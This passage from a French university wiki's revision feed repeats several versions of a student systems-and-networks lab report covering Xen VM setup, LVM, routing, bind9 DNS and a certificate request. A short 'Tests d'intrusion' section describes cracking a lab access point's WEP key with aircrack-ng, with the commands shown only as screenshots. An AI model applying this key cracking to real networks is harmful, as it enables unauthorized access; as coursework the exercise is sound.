Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
* Cassage de clef WEP d'un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    etc/bind9/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha:256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53034</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53034"/>
				<updated>2020-11-02T14:40:15Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
* Cassage de clef WEP d'un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    etc/bind9/&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha:256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53031</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53031"/>
				<updated>2020-11-02T14:38:11Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
* Cassage de clef WEP d'un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clé trouvée]]&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    etc/bind9/&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha:256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53029</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53029"/>
				<updated>2020-11-02T14:36:31Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clé trouvée]]&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    etc/bind9/&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha:256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52975</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52975"/>
				<updated>2020-11-02T13:50:02Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
